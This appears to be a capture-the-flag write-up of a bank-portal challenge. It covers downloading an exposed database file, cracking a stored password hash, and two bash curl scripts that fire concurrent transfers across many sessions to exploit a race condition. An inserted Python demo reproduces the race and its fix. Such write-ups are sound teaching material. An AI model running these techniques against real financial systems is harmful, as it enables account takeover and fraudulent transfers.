SecureBank has released a beta of their new banking portal. Can you take a look and see if it is secure?
🗄️ Files
👀 Enumeration
When I opened the website I saw the simple login page. I didn’t have any credentials, so I looked at the source code.
The first thing I noticed was that error reporting was enabled in index.php, but in the end it was not key to solving this challenge.
error_reporting(E_ALL);
ini_set("display_errors", 1);
🔑 Credentials
Then I looked deeper and noticed that the server uses an SQLite database. I tried to fetch this database directly via the URL /bank.db, and it was accessible. The client table in the database contained credentials.
The user was john and the password hash was 6579e96f76baa00787a28653876c6127.
After cracking this hash with CrackStation I got the plaintext password johndoe.
The credentials worked on the login page, and I was successfully logged in and solved the first piece of the puzzle.
💰 Printing money
The restricted content was a simple bank website where I was able to transfer money and see the transaction history with the current balance for each account. Our pwned account had two bank accounts: “transaction account” and “savings account”.
In the promo.php file I noticed the following line:
<p>Congratulations! You have saved 25 euro. Your gift code is <b><?=$_ENV["PROMOCODE"] ?></b></p>
This line was shown when a bank account held more than 25 euros. I had 20 euros in total. So this was the last key to get the flag?
transfer.php contained the logic behind transferring money. After reviewing the input validation conditions, it looked secure.
Before the SQL query that transferred the money were the following lines:
$source_account_number = $_POST["source"];
$destination_account_number = $_POST["destination"];
$timestamp = time();
// $amount comes from the validated input earlier in transfer.php
$hash = $amount . $source_account_number . $destination_account_number . $timestamp;
// 3,000,000 rounds of sha1 before the balance is touched: pure delay, the result is never used
for ($i = 0; $i < 3000000; $i++) {
    $hash = sha1($hash);
}
These lines were really strange and didn’t make sense. What came to my mind when I saw them was a race condition.
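To make the failure mode concrete, here is an added example (my own code, not the challenge's PHP) that reproduces the check-then-act race against an SQLite file and shows the fix. It is written in Python rather than PHP so it can be run directly; the accounts table with iban/balance_cents columns, the starting balance of 20.00 euro and the 0.2 s sleep standing in for the sha1 loop are constructed assumptions, while the account numbers and the 30 concurrent 1.00 euro transfers are taken from the write-up's own scripts. The vulnerable function reads the balance, checks it, does slow work and only then debits, which is the shape of transfer.php; the fixed one takes the write lock first (BEGIN IMMEDIATE) and makes the funds check part of the UPDATE itself, so a concurrent request can never debit an account that no longer covers the amount.

```python
"""Check-then-act race in a bank transfer, reproduced against SQLite (added example).

The table layout accounts(iban, balance_cents) and the starting balance are
constructed for this demo; the account numbers and the 30 concurrent 1.00 euro
transfers follow the write-up's scripts.
"""
import os
import sqlite3
import tempfile
import threading
import time

SRC = "EU42SECB00051380016"   # transaction account (from the write-up's curl data)
DST = "EU88SECB00051380017"   # savings account
WORKERS = 30                  # concurrent transfer requests
AMOUNT = 100                  # 1.00 euro, kept as integer cents to avoid float drift
START = 2000                  # assumed 20.00 euro on the source account


def fresh_db() -> str:
    """Create a throw-away bank.db with START cents on SRC and nothing on DST."""
    path = os.path.join(tempfile.mkdtemp(), "bank.db")
    conn = sqlite3.connect(path)
    conn.execute("CREATE TABLE accounts (iban TEXT PRIMARY KEY, balance_cents INTEGER NOT NULL)")
    conn.executemany("INSERT INTO accounts VALUES (?, ?)", [(SRC, START), (DST, 0)])
    conn.commit()
    conn.close()
    return path


def connect(path: str) -> sqlite3.Connection:
    # Autocommit mode (BEGIN/COMMIT are issued explicitly); the busy timeout makes a
    # writer wait for the lock instead of failing with "database is locked".
    return sqlite3.connect(path, timeout=10, isolation_level=None)


def transfer_vulnerable(path: str, amount: int, gate: threading.Barrier) -> bool:
    """Check-then-act, the shape of transfer.php: the balance test and the
    debit are separate statements with slow work in between."""
    conn = connect(path)
    try:
        gate.wait()  # release all workers together so they all read the same balance
        (balance,) = conn.execute(
            "SELECT balance_cents FROM accounts WHERE iban = ?", (SRC,)).fetchone()
        if balance < amount:
            return False
        time.sleep(0.2)  # stands in for the 3,000,000-round sha1 loop
        conn.execute("UPDATE accounts SET balance_cents = balance_cents - ? WHERE iban = ?",
                     (amount, SRC))
        conn.execute("UPDATE accounts SET balance_cents = balance_cents + ? WHERE iban = ?",
                     (amount, DST))
        return True
    finally:
        conn.close()


def transfer_fixed(path: str, amount: int, gate: threading.Barrier) -> bool:
    """Take the write lock first, then make the funds check part of the UPDATE."""
    conn = connect(path)
    try:
        gate.wait()
        conn.execute("BEGIN IMMEDIATE")  # serialises writers before any balance is read
        debited = conn.execute(
            "UPDATE accounts SET balance_cents = balance_cents - ? "
            "WHERE iban = ? AND balance_cents >= ?", (amount, SRC, amount)).rowcount
        if debited != 1:  # insufficient funds: nothing changed, so just roll back
            conn.execute("ROLLBACK")
            return False
        conn.execute("UPDATE accounts SET balance_cents = balance_cents + ? WHERE iban = ?",
                     (amount, DST))
        conn.execute("COMMIT")
        return True
    finally:
        conn.close()


def run_race(transfer) -> dict:
    """Fire WORKERS concurrent transfers through `transfer` and report the outcome."""
    path = fresh_db()
    gate = threading.Barrier(WORKERS)
    results = []
    threads = [threading.Thread(target=lambda: results.append(transfer(path, AMOUNT, gate)))
               for _ in range(WORKERS)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    conn = sqlite3.connect(path)
    balances = dict(conn.execute("SELECT iban, balance_cents FROM accounts").fetchall())
    conn.close()
    return {"source": balances[SRC], "dest": balances[DST], "succeeded": sum(results)}


if __name__ == "__main__":
    print("vulnerable:", run_race(transfer_vulnerable))  # source ends at -1000 cents
    print("fixed:     ", run_race(transfer_fixed))       # 20 succeed, source ends at 0
```

The vulnerable run ends with the source account at -10.00 euro and 30.00 euro on the destination: every request saw the same 20.00 euro before any of them wrote, so the "enough funds" check was passed 30 times. The fixed run commits exactly 20 transfers and rejects the other 10. In the real code the same repair is one conditional UPDATE (or SELECT ... FOR UPDATE on databases that support it) inside a single transaction; the long sha1 loop only widens the window, it does not create the bug. It also explains why the write-up's first script saw its requests handled one by one: PHP's default file session handler keeps the session file locked for the whole request, so requests sharing one PHPSESSID are serialised by the server, and the race only opens once each request carries its own session.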
0️⃣ First try
At first, I tried to send several requests at the same time, each transferring 1 euro from one bank account to the other. I wrote this small bash script:
#!/bin/bash
# one logged-in session, reused by every request
session="b95eb36da2fb8d33bea80e2ab4024c87"
challenge_session="3c135044636d6b2088bd76f7"
# the loop variable must not be called "session", or it overwrites the cookie value
for i in {1..30}
do
    curl --silent \
        "https://${challenge_session}-securebank.challenge.master.cscg.live:31337/?page=transfer" \
        --header 'Content-Type: application/x-www-form-urlencoded' \
        --header "Cookie: PHPSESSID=${session}" \
        --data-raw "destination=EU88SECB00051380017&source=EU42SECB00051380016&amount=1.00" > /dev/null &
done
ℹ️ Notice the character & at the end.
When I looked at the transaction history I saw that my requests were resolved one by one.
1️⃣ Try harder!
But how could I force the server to execute these requests simultaneously? I noticed that when I created a new session, the old one was still valid. That gave me an idea: what would happen if I executed each request with a different session? I edited the bash script as follows:
#!/bin/bash
sessions=()
challenge_session="3c135044636d6b2088bd76f7"
# log in once per request and collect the PHPSESSID from the Set-Cookie header
for i in {0..30}
do
    session=$(
        curl --silent \
            --dump-header - --output /dev/null \
            "https://${challenge_session}-securebank.challenge.master.cscg.live:31337/index.php?page=login" \
            --header 'Content-Type: application/x-www-form-urlencoded' \
            --data-raw 'username=john&password=johndoe' | grep --only-matching --perl-regexp '(?<=PHPSESSID=).*?(?=;)'
    )
    sessions+=("$session")
    echo "Session ${i}: ${session}"
done
# fire all transfers in the background, each with its own session
for session in "${sessions[@]}"
do
    echo "Executing transaction with session ${session}"
    curl --silent \
        "https://${challenge_session}-securebank.challenge.master.cscg.live:31337/?page=transfer" \
        --header 'Content-Type: application/x-www-form-urlencoded' \
        --header "Cookie: PHPSESSID=${session}" \
        --data-raw "destination=EU88SECB00051380017&source=EU42SECB00051380016&amount=1.00" > /dev/null &
done
When I executed it, I had 46 euros in my savings account 🤑. When I requested the PROMOCODE I got the flag 🏴☠️!
I printed 21 euros from thin air like the ECB and the FED 🤮. God bless ₿itcoin.